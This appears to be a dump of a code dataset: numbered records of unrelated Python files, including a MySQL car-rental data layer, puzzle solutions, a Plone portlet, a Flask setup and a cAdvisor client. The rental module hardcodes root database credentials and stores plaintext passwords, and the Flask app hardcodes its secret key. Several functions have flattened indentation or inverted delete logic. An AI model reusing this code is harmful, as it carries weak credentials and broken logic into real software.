        """Pop and return the item at index i, keeping the Counter in sync."""
        item = super().pop(i)
        if hasattr(self, 'cnt'):
            self.cnt[item] -= 1
            if self.cnt[item] <= 0:
                del self.cnt[item]
        return item
# Demo: y is the counter returned by Count(); append() keeps it in sync,
# so the second print shows '3' counted twice.
countedlist=CountedList(['1', '2', '3'])
y=countedlist.Count()
print(y)
countedlist.append('3')
print(y)
|
7,660 | 62bad8eeb3b51a5012dad761a60639d36429d8e8 | import pymysql
from app_module.models import User, Vehicle, Address, Customer, Location, Coupon, VehicleClass, Corporation, Corporate
from datetime import datetime
HOSTNAME = 'localhost'
USERNAME = 'root'
PASSWORD = '123456'
DATABASE = 'proj_p2'
def get_connection():
    """Open and return a fresh pymysql connection to the configured database."""
    return pymysql.connect(host=HOSTNAME, user=USERNAME, passwd=PASSWORD, db=DATABASE)
def run_query(query, args=None):
    """Execute *query* with optional parameters.

    Returns the fetched rows when the query produced any, otherwise None
    (preserving the original contract).

    Fix: the original returned early whenever rows were fetched, leaking
    the connection and cursor (no close) and skipping commit entirely for
    such queries. The connection is now always committed and closed via
    try/finally.
    """
    conn = get_connection()
    try:
        cur = conn.cursor()
        try:
            cur.execute(query, args)
            rs = cur.fetchall()
            conn.commit()
        finally:
            cur.close()
    finally:
        conn.close()
    if len(rs) != 0:
        return rs
def insert_address(address_obj):
run_query('''insert into zlrz_address (state, city, street, zipcode) values (%s, %s, %s, %s)'''
, (address_obj.state, address_obj.city, address_obj.street, int(address_obj.zipcode)))
rs = run_query('''select * from zlrz_address where state = %s and city = %s and street=%s and zipcode=%s'''
, (address_obj.state, address_obj.city, address_obj.street, int(address_obj.zipcode)))
return rs[0][0]
def insert_customer(customer_obj):
run_query('''insert into zlrz_customer (cust_type, firstname, lastname, cust_email, cust_phonenum, addr_id,
username, password) values (%s, %s, %s, %s, %s, %s, %s, %s) '''
, (customer_obj.cust_type, customer_obj.first_name, customer_obj.last_name, customer_obj.cust_email,
customer_obj.cust_phonenum, customer_obj.address_id, customer_obj.username, customer_obj.password))
rs = run_query(
'''select * from zlrz_customer where firstname = %s and lastname = %s and cust_email = %s and cust_phonenum = %s order by cust_id desc'''
, (customer_obj.first_name, customer_obj.last_name, customer_obj.cust_email, customer_obj.cust_phonenum))
return rs[0][0]
def insert_vehicle(vehicle_obj):
run_query('''insert into zlrz_vehicle (veh_make, veh_model, veh_year, veh_vin, veh_license, vc_num, ol_id) values
(%s, %s, %s, %s, %s, %s, %s) '''
, (
vehicle_obj.make, vehicle_obj.model, int(vehicle_obj.year), vehicle_obj.vin_num, vehicle_obj.license_num,
vehicle_obj.class_num, vehicle_obj.location_id))
rs = run_query('''select * from zlrz_vehicle where veh_make = %s and veh_model = %s and veh_year = %s and veh_vin
= %s and veh_license = %s and vc_num = %s and ol_id = %s '''
, (vehicle_obj.make, vehicle_obj.model, int(vehicle_obj.year), vehicle_obj.vin_num,
vehicle_obj.license_num, vehicle_obj.class_num, vehicle_obj.location_id))
return rs[0][0]
def insert_vehicle_class(class_obj):
run_query('''insert into zlrz_vehicle_class (vc_name, vc_rateperday, vc_feeovermile) values (%s, %s, %s)'''
, (class_obj.vc_name, int(class_obj.vc_rateperday), int(class_obj.vc_feeovermile)))
rs = run_query('''select * from zlrz_vehicle_class where vc_name = %s and vc_rateperday = %s and vc_feeovermile =
%s '''
, (class_obj.vc_name, int(class_obj.vc_rateperday), int(class_obj.vc_feeovermile)))
return rs[0][0]
def insert_office_location(location_obj):
run_query('''insert into zlrz_office_location (ol_phonenum, ol_state, ol_city, ol_street, ol_zipcode) values (%s,
%s, %s, %s, %s) '''
, (location_obj.phone, location_obj.state, location_obj.city, location_obj.street,
int(location_obj.zipcode)))
rs = run_query('''select * from zlrz_office_location where ol_phonenum = %s and ol_state = %s and ol_city = %s
and ol_street=%s and ol_zipcode=%s '''
, (location_obj.phone, location_obj.state, location_obj.city, location_obj.street,
int(location_obj.zipcode)))
return rs[0][0]
def insert_corporation(corp_obj):
run_query('''insert into zlrz_corporation (corp_name, corp_regnum) values (%s, %s)'''
, (corp_obj.corp_name, corp_obj.corp_regnum))
rs = run_query('''select * from zlrz_corporation where corp_name = %s and corp_regnum = %s'''
, (corp_obj.corp_name, corp_obj.corp_regnum))
return rs[0][0]
def insert_corporate(corporate_obj):
run_query('''insert into zlrz_corporate (cust_id, employee_id, corp_id, cust_type) values (%s, %s, %s, %s)'''
, (corporate_obj.cust_id, corporate_obj.employee_id, corporate_obj.corp_id, corporate_obj.cust_type))
rs = run_query(
'''select * from zlrz_corporate where cust_id = %s and employee_id = %s and corp_id = %s and cust_type = %s'''
, (corporate_obj.cust_id, corporate_obj.employee_id, corporate_obj.corp_id, corporate_obj.cust_type))
return rs[0][0]
def insert_individual(individual_obj):
    """Insert an individual-customer row and return its first column."""
    values = (individual_obj.cust_id, individual_obj.cust_driverlicnum, individual_obj.cust_insurcompname,
              individual_obj.cust_insurpolnum, individual_obj.cust_type)
    run_query(
        '''insert into zlrz_individual (cust_id, cust_driverlicnum, cust_insurcompname, cust_insurpolnum, cust_type) values (%s, %s, %s, %s, %s)''',
        values)
    rows = run_query(
        '''select * from zlrz_individual where cust_id = %s and cust_driverlicnum = %s and cust_insurcompname = %s and cust_insurpolnum = %s and cust_type = %s''',
        values)
    return rows[0][0]
def insert_invoice(invoice_obj):
    """Insert an invoice row and return its first column (the invoice id)."""
    values = (invoice_obj.inv_date, invoice_obj.inv_amount)
    run_query('''insert into zlrz_invoice (inv_date, inv_amount) values (%s, %s) ''', values)
    rows = run_query('''select * from zlrz_invoice where inv_date = %s and inv_amount = %s''', values)
    return rows[0][0]
def insert_payment(payment_obj):
    """Insert a payment row and return its first column (the payment id)."""
    values = (payment_obj.pay_date, payment_obj.pay_method, payment_obj.pay_cardnum,
              payment_obj.inv_id, payment_obj.pay_amount)
    run_query('''insert into zlrz_payment (pay_date, pay_method, pay_cardnum, inv_id, pay_amount)
    values (%s, %s , %s , %s , %s) ''', values)
    rows = run_query('''select * from zlrz_payment where pay_date=%s and pay_method=%s and pay_cardnum=%s and inv_id=%s
    and pay_amount=%s''', values)
    return rows[0][0]
def insert_rental(rental_obj):
    """Insert a rental row and return its first column (the rental id)."""
    values = (rental_obj.ren_pickupdate, rental_obj.ren_dropoffdate, rental_obj.ren_startodometer,
              rental_obj.ren_endodometer, rental_obj.ren_dailylimit, rental_obj.cust_id,
              rental_obj.cust_type, rental_obj.veh_id, rental_obj.ren_pickuplocid,
              rental_obj.ren_dropoffloc_id, rental_obj.inv_id, rental_obj.cou_id)
    run_query('''insert into zlrz_rental (ren_pickupdate, ren_dropoffdate, ren_startodometer, ren_endodometer
    , ren_dailylimit, cust_id, cust_type, veh_id, ren_pickuplocid, ren_dropoffloc_id, inv_id, cou_id)
    values (%s, %s , %s , %s , %s, %s, %s, %s, %s, %s, %s, %s) ''', values)
    rows = run_query('''select * from zlrz_rental where ren_pickupdate=%s and ren_dropoffdate=%s and ren_startodometer=%s
    and ren_endodometer=%s and ren_dailylimit=%s and cust_id=%s and cust_type=%s and veh_id=%s and ren_pickuplocid=%s
    and ren_dropoffloc_id=%s and inv_id=%s and cou_id=%s''', values)
    return rows[0][0]
def insert_coupon(coupon_obj):
    """Insert a coupon row and return the id of the newest matching row.

    Coupons may have null validity dates, so the lookup branches on whether
    dates were supplied. Bug fix: the null-dates branch passed its parameter
    as ``(coupon_obj.cou_rate)`` -- parentheses without a trailing comma do
    not make a tuple, so run_query received a bare scalar instead of the
    parameter sequence used everywhere else in this module.
    """
    run_query('''insert into zlrz_coupons (cou_rate, validstart, validend) values (%s, %s, %s) '''
              , (coupon_obj.cou_rate, coupon_obj.validstart, coupon_obj.validend))
    if coupon_obj.validstart and coupon_obj.validend:
        rs = run_query(
            '''select * from zlrz_coupons where cou_rate = %s and validstart = %s and validend = %s order by cou_id desc'''
            , (coupon_obj.cou_rate, coupon_obj.validstart, coupon_obj.validend))
    else:
        rs = run_query(
            '''select * from zlrz_coupons where cou_rate = %s and validstart is null and validend is null order by cou_id desc'''
            , (coupon_obj.cou_rate,))
    return rs[0][0]
def insert_cust_coupon(cust_coupon_obj):
    """Link a coupon to a customer; nothing is returned."""
    values = (cust_coupon_obj.cou_id, cust_coupon_obj.cust_id, cust_coupon_obj.cust_type,
              cust_coupon_obj.coupon_type)
    run_query('''insert into zlrz_cust_coupon (cou_id, cust_id, cust_type, coupon_type) values (%s, %s, %s, %s) ''',
              values)
    return
def get_password(username):
    """Return the stored password for username, or None when no row matches."""
    rows = run_query('''select password from zlrz_customer where username = %s''', (username,))
    if rows is None:
        return None
    return rows[0][0]
def get_user_type(username):
    """Return the customer's cust_type for username, or None when absent."""
    rows = run_query('''select cust_type from zlrz_customer where username = %s''', (username,))
    if rows is None:
        return None
    return rows[0][0]
def get_user_id(username):
    """Return the customer's cust_id for username, or None when absent."""
    rows = run_query('''select cust_id from zlrz_customer where username = %s''', (username,))
    if rows is None:
        return None
    return rows[0][0]
def get_all_corporations():
    """Return every corporation as a Corporation object (empty list if none)."""
    rows = run_query('''select * from zlrz_corporation''')
    if rows is None:
        return []
    return [Corporation(row[1], row[2], row[0]) for row in rows]
def get_cust_coupon(cust_id):
    """Return all Coupon objects owned by the given customer (empty list if none).

    Bug fix: the query parameter was passed as ``(cust_id)`` -- a bare value,
    not a 1-tuple -- unlike the identical query in get_coupon below.
    """
    rs = run_query('''select zlrz_coupons.* from zlrz_cust_coupon join zlrz_coupons
    on zlrz_cust_coupon.cou_id = zlrz_coupons.cou_id where zlrz_cust_coupon.cust_id = %s''', (cust_id,))
    return [] if rs is None else list(map(lambda t: Coupon(t[1], t[2], t[3], t[0]), rs))
def get_coupon(cust_id):
    """Return the customer's best applicable coupon (highest cou_rate), or None.

    A coupon qualifies if today falls inside its [validstart, validend]
    window, or if it has no dates at all (treated as always valid).
    """
    rs = run_query('''select zlrz_coupons.* from zlrz_cust_coupon join zlrz_coupons
    on zlrz_cust_coupon.cou_id = zlrz_coupons.cou_id where zlrz_cust_coupon.cust_id = %s'''
                   , (cust_id,))
    res = None
    maxrate = float('-inf')
    if rs is not None:
        coupons = list(map(lambda t: Coupon(t[1], t[2], t[3], t[0]), rs))
        for cou in coupons:
            if cou.validstart and cou.validend:
                # Dated coupon: usable only within its validity window.
                if (datetime.now() - cou.validstart).days >= 0 and (cou.validend - datetime.now()).days >= 0:
                    if cou.cou_rate > maxrate:
                        maxrate = cou.cou_rate
                        res = cou
            # Undated coupon: always usable.
            if not cou.validstart and not cou.validend:
                if cou.cou_rate > maxrate:
                    maxrate = cou.cou_rate
                    res = cou
    return res
def get_vehicles():
    """Return the raw vehicle rows (empty list when the table is empty)."""
    rows = run_query('''select * from zlrz_vehicle''')
    return rows if rows is not None else []
def get_all_customers():
    """Return every customer as a Customer object (empty list if none)."""
    rows = run_query('''select * from zlrz_customer''')
    if rows is None:
        return []
    return [Customer(r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[0]) for r in rows]
def get_all_corporate():
    """Return every corporate-customer link as a Corporate object."""
    rows = run_query('''select * from zlrz_corporate''')
    if rows is None:
        return []
    return [Corporate(r[0], r[1], r[2], r[3]) for r in rows]
def get_all_individual():
    # NOTE(review): rows from zlrz_individual are mapped to Corporate with 5
    # positional args, while get_all_corporate constructs Corporate with 4.
    # This looks like a copy-paste slip -- presumably an Individual class was
    # intended here; confirm the model's name and fix.
    rs = run_query('''select * from zlrz_individual''')
    return [] if rs is None else list(map(lambda t: Corporate(t[0], t[1], t[2], t[3], t[4]), rs))
def get_all_vehicles():
    """Return every vehicle as a Vehicle object (empty list if none)."""
    rows = run_query('''select * from zlrz_vehicle''')
    if rows is None:
        return []
    return [Vehicle(r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[0]) for r in rows]
def get_all_locations():
    """Return every office location as a Location object (empty list if none)."""
    rows = run_query('''select * from zlrz_office_location''')
    if rows is None:
        return []
    return [Location(r[1], r[2], r[3], r[4], r[5], r[0]) for r in rows]
def get_location_by_id(location_id):
    """Return the Location with the given ol_id, or None when not found."""
    rows = run_query('''select * from zlrz_office_location where ol_id = %s''', (location_id,))
    if rows is None:
        return None
    first = rows[0]
    return Location(first[1], first[2], first[3], first[4], first[5], first[0])
def get_all_vehclasses():
    """Return every vehicle class as a VehicleClass object (empty list if none)."""
    rows = run_query('''select * from zlrz_vehicle_class''')
    if rows is None:
        return []
    return [VehicleClass(r[1], r[2], r[3], r[0]) for r in rows]
def get_vehicle_by_id(vehicle_id):
    """Return the Vehicle with the given veh_id, or None when not found."""
    rows = run_query('''select * from zlrz_vehicle where veh_id=%s''', (int(vehicle_id),))
    if rows is None:
        return None
    first = rows[0]
    return Vehicle(first[1], first[2], first[3], first[4], first[5], first[6], first[7], first[0])
def get_vehicle_class(vehicle_id):
    """Return the VehicleClass of the given vehicle, or None when not found."""
    rows = run_query('''select zlrz_vehicle_class.* from zlrz_vehicle join zlrz_vehicle_class
    on zlrz_vehicle.vc_num = zlrz_vehicle_class.vc_num where zlrz_vehicle.veh_id=%s''', (int(vehicle_id),))
    if rows is None:
        return None
    first = rows[0]
    return VehicleClass(first[1], first[2], first[3], first[0])
def delete_veh_class(vc_num):
    """Delete a vehicle class unless vehicles still reference it.

    Returns None for blank input, 1 when the class is still in use, otherwise
    the run_query result. Bug fix: parameters are now passed as 1-tuples --
    ``(int(vc_num))`` is just an int, not the parameter sequence the other
    queries in this module pass.
    """
    if vc_num == '':
        return
    key = (int(vc_num),)
    res = run_query('''select * from zlrz_vehicle where vc_num=%s''', key)
    if res:
        return 1  # still referenced by at least one vehicle
    return run_query('''delete from zlrz_vehicle_class where vc_num=%s''', key)
def delete_off_loc(location_id):
    """Delete an office location unless rows still reference it.

    Returns None for blank input, 1 when the location is still in use,
    otherwise the run_query result. Bug fix: parameters are now 1-tuples;
    ``(int(location_id))`` was a bare int.
    """
    if location_id == '':
        return
    key = (int(location_id),)
    res = run_query('''select * from zlrz_office_location where ol_id=%s''', key)
    if res:
        return 1  # location exists; caller treats 1 as "in use / present"
    return run_query('''delete from zlrz_office_location where ol_id=%s''', key)
def delete_vehicle(veh_id):
    """Delete the vehicle with the given id; no-op for blank input.

    Bug fix: the parameter is now a 1-tuple; ``(int(veh_id))`` was a bare int.
    """
    if veh_id == '':
        return
    return run_query('''delete from zlrz_vehicle where veh_id=%s''', (int(veh_id),))
def delete_customer(cust_id):
    """Delete a customer and all dependent rows; returns the customer-delete
    result (None for blank input).

    Bug fix: parameters are now 1-tuples; ``(int(cust_id))`` was a bare int.
    """
    if cust_id == '':
        return
    key = (int(cust_id),)
    # Children first so foreign-key constraints are satisfied.
    run_query('''delete from zlrz_rental where cust_id=%s''', key)
    run_query('''delete from zlrz_cust_coupon where cust_id=%s''', key)
    run_query('''delete from zlrz_corporate where cust_id=%s''', key)
    run_query('''delete from zlrz_individual where cust_id=%s''', key)
    return run_query('''delete from zlrz_customer where cust_id=%s''', key)
def delete_cust_coupon(cou_id):
    """Delete a coupon and its customer links; returns the link-delete result.

    Bug fix: parameters are now 1-tuples; ``(int(cou_id))`` was a bare int.
    """
    if cou_id == '':
        return
    key = (int(cou_id),)
    link_result = run_query('''delete from zlrz_cust_coupon where cou_id=%s''', key)
    run_query('''delete from zlrz_coupons where cou_id=%s''', key)
    return link_result
def delete_corporation(corp_id):
    """Delete a corporation; returns 1 when it exists per the guard query,
    otherwise the delete result (None for blank input).

    Bug fix: parameters are now 1-tuples; ``(int(corp_id))`` was a bare int.
    """
    if corp_id == '':
        return
    key = (int(corp_id),)
    res = run_query('''select * from zlrz_corporation where corp_id=%s''', key)
    if res:
        return 1
    return run_query('''delete from zlrz_corporation where corp_id=%s''', key)
def update_vehicle_class(class_obj):
    """Update daily rate and over-mile fee for the class matching vc_name."""
    params = (int(class_obj.vc_rateperday), int(class_obj.vc_feeovermile), class_obj.vc_name)
    return run_query('''update zlrz_vehicle_class set vc_rateperday = %s, vc_feeovermile = %s where vc_name = %s''', params)
7,661 | 1803f634c8e833f4a92ae35bcfafb04dfd1d2305 | #!/usr/bin/env python
import sys
def solve(n, k):
    """Return True when all 2**n chained snappers are lit after k snaps.

    The chain behaves like a binary counter: the light is on exactly when
    k mod 2**n equals 2**n - 1.
    """
    period = 2 ** n
    return k % period == period - 1
def main():
    """Read T test cases of 'N K' from stdin and print ON/OFF per case.

    Python 2 script (print statement). T is read but the loop simply
    processes every remaining input line.
    """
    lines = sys.stdin.readlines()
    T = int(lines[0])
    for i, line in enumerate(lines[1:]):
        N, K = line.split(' ')
        on = solve(int(N), int(K))
        str_on = 'OFF'
        if on:
            str_on = 'ON'
        print 'Case #%d: %s' % (i+1, str_on)
if __name__ == '__main__': main()
|
7,662 | 299b437c007d78c3d9a53205de96f04d2c6118e0 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 11 07:41:34 2017
@author: Gabriel
"""
months = 12
balance = 4773
annualInterestRate = 0.2
# NOTE(review): despite the name, this value is used below as a fixed monthly
# payment AMOUNT (subtracted from the balance), not a rate -- confirm intent.
monthlyPaymentRate = 434.9
monthlyInterestRate = annualInterestRate / 12
while months > 0:
    # NOTE(review): minimumMonPayment is computed but never used; either it
    # or the flat monthlyPaymentRate subtraction below is leftover code.
    minimumMonPayment = monthlyPaymentRate * balance
    monthlyUnpaidBalan = balance - monthlyPaymentRate
    # Result of the balance
    balance = monthlyUnpaidBalan + (monthlyInterestRate * monthlyUnpaidBalan)
    months -= 1
print('Remaining balance:', format(balance, '.2f'))
|
7,663 | 632c690261b31c7ac0e1d90c814e3b9a7a0dcb29 | #
# @lc app=leetcode.cn id=784 lang=python3
#
# [784] 字母大小写全排列
#
# @lc code=start
# 回溯法 --> 通过 64 ms 13.5 MB
class Solution:
    """LeetCode 784: generate every letter-case variant of S via DFS backtracking."""

    def __init__(self):
        self.result = []

    def letterCasePermutation(self, S: str) -> List[str]:
        """Return all strings obtainable from S by toggling letter case."""
        chars = list(S)
        self.backtracing(chars, 0)
        return self.result

    def backtracing(self, chars, pos):
        """Depth-first search from index pos, collecting finished variants."""
        if pos == len(chars):
            self.result.append(''.join(chars))
            return
        # Branch 1: keep the current character unchanged.
        self.backtracing(chars, pos + 1)
        # Branch 2: if it is a letter, flip its case and recurse again.
        if chars[pos].isalpha():
            chars[pos] = chars[pos].lower() if chars[pos].isupper() else chars[pos].upper()
            self.backtracing(chars, pos + 1)
|
7,664 | 214585956e44ce006db0702fd23692b11459f9e1 | from five import grok
from zope.formlib import form
from zope import schema
from zope.interface import implements
from zope.component import getMultiAdapter
from plone.app.portlets.portlets import base
from plone.memoize.instance import memoize
from plone.portlets.interfaces import IPortletDataProvider
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from Products.CMFCore.utils import getToolByName
#grok.templatedir('templates')
class IContentNavigation(IPortletDataProvider):
    """Schema for the Twitter-feed portlet: a header plus the Twitter account
    and widget id used to render the embedded timeline."""
    portlet_header = schema.TextLine(
        title = u"Portlet Header",
        default = u"TWITTER FEED",
        required = False
    )
    twitter_username = schema.TextLine(
        title = u"Twitter Username",
        default = u"isclimatechange"
    )
    twitter_widgetId = schema.TextLine(
        title = u"Twitter Widget ID",
        default = u"565570873433006080"
    )
class Assignment(base.Assignment):
    """Persistent portlet assignment holding the configured schema values."""
    implements(IContentNavigation)
    def __init__(self,portlet_header=None, twitter_username= None, twitter_widgetId=None):
        self.portlet_header = portlet_header
        self.twitter_username = twitter_username
        self.twitter_widgetId = twitter_widgetId
    @property
    def title(self):
        # Title shown in the portlet management screen.
        return self.portlet_header
class Renderer(base.Renderer):
    """Renders the portlet via the twitterportlet.pt page template."""
    render = ViewPageTemplateFile('twitterportlet.pt')
    def __init__(self, context, request, view, manager, data):
        self.context = context
        self.request = request
        self.view = view
        self.manager = manager
        self.data = data
    def contents(self):
        """Expose the assignment data to the template."""
        return self.data
class AddForm(base.AddForm):
    """zope.formlib add form; builds an Assignment from the schema fields."""
    form_fields = form.Fields(IContentNavigation)
    label = u"Add Twitter Portlet"
    description = ''
    def create(self, data):
        """Create an empty Assignment and copy the submitted form data onto it."""
        assignment = Assignment()
        form.applyChanges(assignment, self.form_fields, data)
        return assignment
class EditForm(base.EditForm):
    """zope.formlib edit form for an existing Twitter portlet assignment."""
    form_fields = form.Fields(IContentNavigation)
    label = u"Edit Twitter Portlet"
    description = ''
|
7,665 | bd726c86bdecd0b63eb48d056932706d3ecf147d | import os,sys
import logging
from flask import Flask
from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
def create_app():
    """Build the Flask application and attach Bootstrap support."""
    flask_app = Flask(__name__)
    Bootstrap(flask_app)
    return flask_app
logging.basicConfig(level=logging.DEBUG)
app = create_app()
app.config['WTF_CSRF_ENABLED'] = True
# SECURITY(review): hard-coded secret key; load from the environment for any
# non-development deployment.
app.config['SECRET_KEY'] = 'you-will-never-guess'
# SQLite database lives at <project root>/db/micro_scrabble.db.
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))),'db','micro_scrabble.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
db = SQLAlchemy(app)
#app.config.from_object('flask_config')
# Imported last so view functions can bind to the fully configured app.
from . import views
7,666 | a1141e6aae6992a5037d53093378f0d346f2ca29 | #!/usr/bin/env python
from pathlib import Path
import os
from setuptools import setup, find_packages
install_requires = [
    "numpy",
    "tensorflow-hub==0.4.0",
    "bert-tensorflow==1.0.1",
    "click"
]
# Hacky check for whether CUDA is installed
# NOTE(review): any env var containing the token "CUDA" (e.g. CUDA_HOME,
# CUDA_VISIBLE_DEVICES) selects the GPU wheel -- confirm this heuristic.
has_cuda = any("CUDA" in name.split("_") for name in os.environ.keys())
install_requires.append("tensorflow-gpu==1.13.1" if has_cuda else "tensorflow==1.13.1")
# Single-source the package version from easybert/VERSION.txt.
version_file = Path(__file__).parent.joinpath("easybert", "VERSION.txt")
version = version_file.read_text(encoding="UTF-8").strip()
setup(
    name="easybert",
    version=version,
    url="https://github.com/robrua/easy-bert",
    author="Rob Rua",
    author_email="robertrua@gmail.com",
    description="A Dead Simple BERT API (https://github.com/google-research/bert)",
    keywords=["BERT", "Natural Language Processing", "NLP", "Language Model", "Language Models", "Machine Learning", "ML", "TensorFlow", "Embeddings", "Word Embeddings", "Sentence Embeddings"],
    classifiers=[
        "Development Status :: 4 - Beta",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
        "Programming Language :: Python :: 3"
    ],
    license="MIT",
    packages=find_packages(),
    entry_points={"console_scripts": ["bert=easybert.__main__:_main"]},
    zip_safe=True,
    install_requires=install_requires,
    include_package_data=True
)
7,667 | 87f672919f6019e549508b239c798301d5f549bd | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2015-2016 Applatix, Inc. All rights reserved.
#
'''
cAdvisor CLI. Used by axstats temporarily before moving to Heapster
'''
import requests
import logging
import time
logger = logging.getLogger(__name__)
CHECK_LIVELINESS_INTERVAL = 5
CONNECTION_TIMEOUT = 5
class AXCadvisorClient(object):
    """Minimal HTTP client for a node-local cAdvisor v2.0 REST endpoint."""

    def __init__(self, ip):
        self._wait_interval = 60
        # Using Kubernetes default cadvisor port
        self._url_prefix = "http://{ip}:{port}/api/v2.0/".format(ip=ip, port=4194)
        self.wait_for_cadvisor_up()

    def wait_for_cadvisor_up(self):
        """
        Poll cadvisor endpoint till there is a response.
        Note it was calling /api/v2.0/version before, but this api in Kubernetes returns empty string
        :return:
        """
        ping = None
        while ping is None:
            # Bug fix: requests.get raises (e.g. ConnectionError) when the
            # endpoint is down instead of returning None, so the retry loop
            # below never actually retried. Swallow request errors and retry.
            try:
                ping = requests.get(self._url_prefix, timeout=CONNECTION_TIMEOUT)
            except requests.exceptions.RequestException:
                ping = None
            if ping is None:
                logger.debug("Unable to connect to cadvisor %s. Will sleep for %s sec",
                             self._url_prefix, CHECK_LIVELINESS_INTERVAL)
                time.sleep(CHECK_LIVELINESS_INTERVAL)
        logger.info("cAdvisor client is up for endpoint %s", self._url_prefix)

    def get_machine_info(self):
        """Fetch static machine information (GET /machine)."""
        url = self._url_prefix + "machine"
        return self._get_response(url)

    def get_spec_info(self):
        """Fetch container specs recursively (GET /spec)."""
        url = self._url_prefix + "spec"
        data = {
            "recursive": "true"
        }
        return self._get_response(url, data)

    def get_events(self, event_start):
        """Fetch all container/subcontainer events since event_start (GET /events)."""
        url = self._url_prefix + "events"
        data = {
            "all_events": "true",
            "subcontainers": "true",
            "start_time": event_start
        }
        return self._get_response(url, data)

    def get_docker_stats(self):
        """Fetch the last _wait_interval recursive stat samples (GET /stats)."""
        url = self._url_prefix + "stats"
        data = {
            "recursive": "true",
            "count": str(self._wait_interval)
        }
        return self._get_response(url, data)

    @staticmethod
    def _get_response(url, params=None):
        """GET url, returning parsed JSON on HTTP 200 and None otherwise."""
        out = None
        try:
            response = requests.get(url=url, params=params, timeout=CONNECTION_TIMEOUT)
            if response.status_code == requests.codes.ok:
                out = response.json()
        except requests.exceptions.RequestException as e:
            logger.error('Unexpected exception occurred during request: %s', e)
        return out
|
7,668 | 68e1e39f193537367d899c5fd01c1361ed93ef29 | n, k = raw_input().split()
n = int(n)
k = int(k)
div = 0
for i in range(n):
new = int(raw_input())
if (new % k) == 0:
div += 1
print div |
7,669 | 7ee3301b55d323d156bd394f8525e37502d19430 | number = int(input())
bonus = 0
if number <= 100:
bonus = 5
total_point = number + bonus
elif number > 1000:
bonus = 0.1 * number
total_point = number + bonus
else:
bonus = 0.2 * number
total_point = number + bonus
if number % 2 == 0:
bonus = bonus + 1
total_point = number + bonus
print(bonus)
print(total_point)
elif number % 10 == 5:
bonus = bonus + 2
total_point = number + bonus
print(bonus)
print(total_point) |
7,670 | c6fa8c33630fc2f7ffb08aace1a260e6805ddfa2 | """Main application for FastAPI"""
from typing import Dict
from fastapi import FastAPI
from fastapi.openapi.utils import get_openapi
from cool_seq_tool.routers import default, mane, mappings, SERVICE_NAME
from cool_seq_tool.version import __version__
# Mount the service under /<SERVICE_NAME>, with docs and the OpenAPI schema
# nested beneath that prefix.
app = FastAPI(
    docs_url=f"/{SERVICE_NAME}",
    openapi_url=f"/{SERVICE_NAME}/openapi.json",
    swagger_ui_parameters={"tryItOutEnabled": True}
)
app.include_router(default.router)
app.include_router(mane.router)
app.include_router(mappings.router)
def custom_openapi() -> Dict:
    """Generate custom fields for OpenAPI response."""
    # Serve the cached schema when it has already been built.
    if app.openapi_schema:
        return app.openapi_schema
    schema = get_openapi(
        title="The GenomicMedLab Cool Seq Tool",
        version=__version__,
        description="Common Operations On Lots-of Sequences Tool.",
        routes=app.routes
    )
    # Attach maintainer contact details before caching.
    schema["info"]["contact"] = {
        "name": "Alex H. Wagner",
        "email": "Alex.Wagner@nationwidechildrens.org",
        "url": "https://www.nationwidechildrens.org/specialties/institute-for-genomic-medicine/research-labs/wagner-lab"  # noqa: E501
    }
    app.openapi_schema = schema
    return app.openapi_schema
# Replace FastAPI's default schema generator with the customized one.
app.openapi = custom_openapi
|
7,671 | 66f6639ae62fe8c0b42171cf3e3fb450d8eee2b2 | from pypc.a_primitives.nand import nand
# nand gates used: 5
def half_adder(a: bool, b: bool) -> (bool, bool):
"""Returns a + b in the form of a tuple of two bools representing the two
bits."""
nand_a_b = nand(a, b)
nand_c = nand(nand_a_b, a)
nand_d = nand(nand_a_b, b)
high = nand(nand_a_b, nand_a_b)
low = nand(nand_c, nand_d)
return high, low
# nand gates used: 9
def full_adder(a: bool, b: bool, c: bool) -> (bool, bool):
"""Returns a + b + c in the form of a tuple of two bools representing the two
bits.
Carried value is ignored.
"""
nand_a_b = nand(a, b)
nand_c = nand(nand_a_b, a)
nand_d = nand(nand_a_b, b)
low_a_b = nand(nand_c, nand_d)
nand_low_a_b_c = nand(low_a_b, c)
nand_e = nand(low_a_b, nand_low_a_b_c)
nand_f = nand(nand_low_a_b_c, c)
high = nand(nand_a_b, nand_low_a_b_c)
low = nand(nand_e, nand_f)
return high, low
|
7,672 | 90c9456bf22745d99fa76dbc752beae1a3835682 | from field import print_field
from math_utilite import sign, col
def start_parameter_2(par):
    """Load saved game state into this module's globals from a 4-sequence:
    (king positions, castling counters, promotion flag, en-passant marker)."""
    global cell_king, castling_control, trans, take_on_aisle
    cell_king, castling_control, trans, take_on_aisle = par[0], par[1], par[2], par[3]
def det_cell_king(field):
    """Locate both kings (piece code +-6) and cache their (x, y) by color."""
    global cell_king
    positions = {}
    for x, row in enumerate(field):
        for y, fig in enumerate(row):
            if abs(fig) == 6:
                positions[sign(fig)] = (x, y)
    cell_king = positions
    return cell_king
def det_castling_control(field):
    """Rebuild castling bookkeeping from the piece placement.

    For each color stores (king_moved, left_rook_moved, right_rook_moved):
    0 when the piece still sits on its home square, 1 otherwise.
    """
    global castling_control
    for color in (1, -1):
        home_rank = 0 if color == 1 else 7
        king_flag = 0 if field[home_rank][4] == 6 * color else 1
        left_rook_flag = 0 if field[home_rank][0] == 2 * color else 1
        right_rook_flag = 0 if field[home_rank][-1] == 2 * color else 1
        castling_control[color] = (king_flag, left_rook_flag, right_rook_flag)
    return castling_control
def king_and_castling(field, color, old, new, d):
    """Update the cached king square and, on castling, relocate the rook.

    d is the application direction: 1 applies the move, -1 undoes it.
    NOTE(review): the castling_control tuple arithmetic encodes move/undo
    counters; confirm against the callers before changing anything here.
    """
    global cell_king, castling_control
    cell_king[color] = (new[0], new[1])
    storlg=new[1]-old[1]
    # A king shifting two files is a castling move.
    if abs(storlg) == 2:
        storlg = sign(storlg)
        # Rook corner file: 7 on the king side, 0 on the queen side
        # (selection flips when undoing, via storlg*d).
        rp = 7 if storlg*d == 1 else 0
